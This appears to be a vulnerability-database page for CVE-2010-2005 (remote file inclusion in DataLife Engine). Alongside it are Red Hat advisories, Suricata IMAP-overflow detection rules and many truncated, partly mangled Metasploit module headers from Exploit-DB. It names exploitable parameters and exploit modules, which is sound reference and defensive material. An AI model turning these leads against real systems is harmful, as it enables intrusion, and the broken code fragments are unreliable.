CVE-2010-2005
Published 2010-05-20
CVE-2010-2005: Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the…
Priority: P3 · 44 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.81% (84.7th percentile)
Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, and (4) the _REQUEST[skin] parameter to engine/ajax/addcomments.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| datalifecms | datalife_engine | — | — |
CVSS provenance
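| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 7.2 | HIGH | — |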
GHSA
GHSA-8xf2-9w2x-9w9x: Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8
ghsa_unreviewed·2022-05-17
CVE-2010-2005 [HIGH] CWE-94 GHSA-8xf2-9w2x-9w9x: Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8
Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, and (4) the _REQUEST[skin] parameter to engine/ajax/addcomments.php.
Red Hat
fastjar: directory traversal vulnerabilities
vendor_redhat·2010-06-06·CVSS 5.0
CVE-2010-0831 [MEDIUM] fastjar: directory traversal vulnerabilities
Directory traversal vulnerability in the extract_jar function in jartool.c in FastJar 0.98 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in a non-initial pathname component in a filename within a .jar archive, a related issue to CVE-2005-1080. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-3619.
Statement: The Red Hat Security Response Team has rated this issue as having low security impact, a future update may address this flaw.
Package: gcc (Red Hat Enterprise Linux 4) - Will not fix
Package: gcc4 (Red Hat Enterprise Linux 4) - Will not fix
Package: gcc44 (Red Hat Enterprise Linux 5) - Not affected
Package: gcc (Red Hat Enterprise Linux 6) - Not affected
Red Hat
rpm: fails to drop SUID/SGID bits on package removal
vendor_redhat·2010-06-01·CVSS 7.2
CVE-2005-4889 [HIGH] rpm: fails to drop SUID/SGID bits on package removal
lib/fsm.c in RPM before 4.4.3 does not properly reset the metadata of an executable file during deletion of the file in an RPM package removal, which might allow local users to gain privileges by creating a hard link to a vulnerable (1) setuid or (2) setgid file, a related issue to CVE-2010-2059.
Suricata
GPL IMAP status overflow attempt
suricata·2010-09-23
CVE-2005-1256 GPL IMAP status overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP status overflow attempt"; flow:established,to_server; content:"STATUS"; nocase; isdataat:100,relative; pcre:"/\sSTATUS\s[^\n]{100}/smi"; reference:bugtraq,11775; reference:bugtraq,13727; reference:cve,2005-1256; classtype:misc-attack; sid:2103072; rev:3; metadata:created_at 2010_09_23, cve CVE_2005_1256, confidence Medium, signature_severity Minor, updated_at 2019_07_26;)
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-4988 SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
CA BrightStor ARCserve License Service - 'GCR NETWORK' Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-03
CVE-2005-0581 CA BrightStor ARCserve License Service - 'GCR NETWORK' Remote Buffer Overflow (Metasploit)
---
##
# $Id: license_gcr.rb 10892 2010-11-03 22:09:44Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.
By sending a specially crafted request to the lic98rmtd.exe service, an attacker
could overflow the buffer and execute arbitrary code.
},
'Author' => [ 'MC
Exploit-DB
GlobalScape Secure FTP Server - Input Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2005-1415 GlobalScape Secure FTP Server - Input Overflow (Metasploit)
---
##
# $Id: globalscapeftp_input.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GlobalSCAPE Secure FTP Server Input Overflow',
'Description' => %q{
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
All versions prior to 3.0.3 are affected by this flaw. A valid user account (
or anonymous access) is required for this exploit to work.
},
'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ],
'License' => BSD_LICENSE,
'
Exploit-DB
SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2005-2373 SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)
---
##
# $Id: slimftpd_list_concat.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SlimFTPd LIST Concatenation Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SlimFTPd
server. The flaw is triggered when a LIST command is
received with an overly-long argument. This vulnerability
affects all versions of SlimFTPd prior to 3.16 and was
discovered by Raphael Rigo.
},
'Author' => [ 'Fairuzan Roslan ' ],
'License' => BSD_
Exploit-DB
URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2005-0308 URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)
---
##
# $Id: ursoft_w32dasm.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'URSoft W32Dasm Disassembler Function Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in W32Dasm MSF_LICENSE,
'Author' => [ 'patrick' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2005-0308' ],
[ 'OSVDB', '13169' ],
[ 'BID', '12352' ],
[ 'URL', 'http://aluigi.altervista.org/adv/w32dasmbof-adv.txt' ],
],
'Defaul
Exploit-DB
Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
exploitdb·2010-09-20
CVE-2005-4560 Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
---
##
# $Id: ms06_001_wmf_setabortproc.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
'Description' => %q{
This module exploits a vulnerability in the GDI library included with
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
to execute arbitrary code through the SetAbortProc procedure. This module
gener
Exploit-DB
3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-0277 3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)
---
##
# $Id: 3cdaemon_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 '3Com 3CDaemon 2.0 FTP Username Overflow',
'Description' => %q{
This module exploits a vulnerability in the 3Com 3CDaemon
FTP service. This package is being distributed from the 3Com
web site and is recommended in numerous support documents.
This module uses the USER command to trigger the overflow.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Vers
Exploit-DB
Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-1815 Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)
---
##
# $Id: hummingbird_exceed.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Hummingbird Connectivity
10 LPD Daemon. This module has only been tested against Hummingbird
Exceed v10 with SP5.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2005-1815'
Exploit-DB
BakBone NetVault - Remote Heap Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-1009 BakBone NetVault - Remote Heap Overflow (Metasploit)
---
##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BakBone NetVault Remote Heap Overflow',
'Description' => %q{
This module exploits a heap overflow in the BakBone NetVault
Process Manager service. This code is a direct port of the netvault.c
code written by nolimit and BuzzDee.
},
'Author' => [ 'hdm', '' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2005-1009'],
['OSVDB', '15234'],
['BID', '12967'
Exploit-DB
Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)
exploitdb·2010-09-20
CVE-2005-2265 Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)
---
##
# $Id: mozilla_compareto.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "1.0",
:ua_maxver => "1.7.10",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Suite/Firefox InstallV
Exploit-DB
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
exploitdb·2010-08-30
CVE-2005-1983 Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
---
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Plug and Play Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account.
NOTE: Since the PnP service runs inside the service.exe process, a failed
exploit attempt will cause the system to automatically reboot.
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-1921 XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
---
##
# $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'Licens
Exploit-DB
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-2733 Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)
---
##
# $Id: sphpblog_file_upload.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Simple PHP Blog %q{
This module combines three separate issues within The Simple PHP Blog ( [ 'Matteo Cantoni ', 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
['CVE', '2005-2733'],
['OSVDB', '19012'],
['BID', '14667'],
['URL', 'http://www.milw0rm.com/exploits/1191'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNo
Exploit-DB
vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-0511 vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
---
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'vBulletin misc.php Template Name Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary PHP code execution flaw in
the vBulletin web forum software. This vulnerability is only
present when the "Add Template Name in HTML Comments" option
is enabled. All versions of vBulletin prior to 3.0.7 are
affected.
},
'Author' =>
[
'
Exploit-DB
Blue Coat WinProxy - Host Header Overflow (Metasploit)
exploitdb·2010-07-12
CVE-2005-4085 Blue Coat WinProxy - Host Header Overflow (Metasploit)
---
##
# $Id: bluecoat_winproxy_host.rb 9797 2010-07-12 23:25:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HEAD', :pattern => [ /BlueCoat/ ] }
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Blue Coat WinProxy Host Header Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Blue Coat Systems WinProxy
service by sending a long port value for the Host header in a HTTP
Exploit-DB
MailEnable - Authorisation Header Buffer Overflow (Metasploit)
exploitdb·2010-07-07
CVE-2005-1348 MailEnable - Authorisation Header Buffer Overflow (Metasploit)
---
##
# $Id: mailenable_auth_header.rb 9719 2010-07-07 17:38:59Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /MailEnable/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable Authorization Header Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in the MailEnable web service.
The vulnerability is triggered when a large value is placed into the Authorization
header o
Exploit-DB
TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-2005-2877 TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)
---
##
# $Id: twiki_history.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TWiki History TWikiUsers rev Parameter Command Execution',
'Description' => %q{
This module exploits a vulnerability in the history component of TWiki.
By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers
script, an attacker can execute arbitrary OS commands.
},
'Author' =>
[
'B4dP4nd4', # original discovery
'jduck' # metasploit version
],
'
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovpl' Remote Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-2005-2773 HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovpl' Remote Command Execution (Metasploit)
---
##
# $Id: openview_connectednodes_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP Openview connectedNodes.ovpl Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
HP OpenView connectedNodes.ovpl CGI application. The results of the command
will be displayed to the screen.
},
'Author' => [ 'Valerio Tesei ', 'hdm' ],
'License
Exploit-DB
Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2005-0773 Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)
---
##
# $Id: remote_agent.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Veritas Backup Exec Windows Remote Agent Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Veritas
BackupExec Windows Agent software. This vulnerability occurs
when a client authentication request is received with type
'3' and a long password argument. Reliable execution is
obtained by abusing the stack buffer overflow to smash a SEH
Exploit-DB
phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-03
CVE-2005-2086 phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)
---
##
# $Id: phpbb_highlight.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'phpBB viewtopic.php Arbitrary Code Execution',
'Description' => %q{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
This vulnerability was introduced in rev
Exploit-DB
freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2005-3683 freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)
---
##
# $Id: freeftpd_user.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'freeFTPd 1.0 Username Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the freeFTPd
multi-protocol file transfer service. This flaw can only be
exploited when logging has been enabled (non-default).
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2005-3683'],
[ 'OSVDB', '20909'],
[ 'BI
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2005-1099 Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
---
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Salim Gasmi
GLD '$Revision: 9669 $',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/
Exploit-DB
Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)
exploitdb·2010-07-01
CVE-2005-4267 Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)
---
##
# $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server
version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this
particular vulnerability.
NOTE: The service does NOT restart automatically by default. You may be limited to
only one a
Exploit-DB
Google Appliance ProxyStyleSheet - Command Execution (Metasploit)
exploitdb·2010-07-01
CVE-2005-3757 Google Appliance ProxyStyleSheet - Command Execution (Metasploit)
---
##
# $Id: google_proxystylesheet_exec.rb 9653 2010-07-01 23:33:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Google Appliance ProxyStyleSheet Command Execution',
'Description' => %q{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be ab
Exploit-DB
Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2010-06-22
CVE-2005-2297 Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: sybase_easerver.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Sybase EAServer 5.2 Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Sybase EAServer Web
Console. The offset to the SEH frame appears to change depending
on what version of Java is in use by the remote server, making this
exploit somewhat unreliable.
},
'Author' => [ 'anonymous' ],
'License' => MSF_LICENSE,
'Ver
Exploit-DB
MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2005-3155 MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)
---
##
# $Id: mailenable_w3c_select.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MailEnable IMAPD W3C Logging Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is
not enabled by default and this exploit requires a valid
username and password to exploit the flaw. MailEnable
Professional version 1.6 and prior and MailEnable Enterprise
version 1
Exploit-DB
Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-3314 Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)
---
##
# $Id: novell_netmail_status.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Novell NetMail %q{
This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS
verb. By sending an overly long string, an attacker can overwrite the
buffer and control program execution.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2005-3314' ],
[ 'OSVDB', '20956' ],
[ '
Exploit-DB
RealNetworks RealPlayer - '.SMIL' Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0455 RealNetworks RealPlayer - '.SMIL' Remote Buffer Overflow (Metasploit)
---
##
# $Id: realplayer_smil.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealNetworks RealPlayer SMIL Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.
By creating a URL link to a malicious SMIL file, a remote attacker could
overflow a buffer and execute arbitrary code.
When using this module, be sure to set the URIPATH with an extension of '.smil'.
This module
Exploit-DB
Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-2852 Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)
---
##
# $Id: lsass_cifs.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.
Since the driver runs in the kernel space, a failed exploit attempt can
cause the OS to reboot.
},
'Author' =>
[
'toto',
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[
Exploit-DB
Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0491 Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)
---
##
# $Id: type77.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
'Description' => %q{
This module exploits a stack buffer overflow in the Arkeia backup
client for the Mac OS X platform. This vulnerability affects
all versions up to and including 5.3.3 and has been tested
with Arkeia 5.3.1 on Mac OS X 10.3.5.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revisi
Exploit-DB
Sentinel LM - UDP Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0353 Sentinel LM - UDP Buffer Overflow (Metasploit)
---
##
# $Id: sentinel_lm7_udp.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SentinelLM UDP Buffer Overflow',
'Description' => %q{
This module exploits a simple stack buffer overflow in the Sentinel
License Manager. The SentinelLM service is installed with a
wide selection of products and seems particular popular with
academic products. If the wrong target value is selected,
the service will crash and not restart.
},
'Author' => [ 'hdm' ],
'License' => MSF
Exploit-DB
MaxDB WebDBM - GET Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0684 MaxDB WebDBM - GET Buffer Overflow (Metasploit)
---
##
# $Id: maxdb_webdbm_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
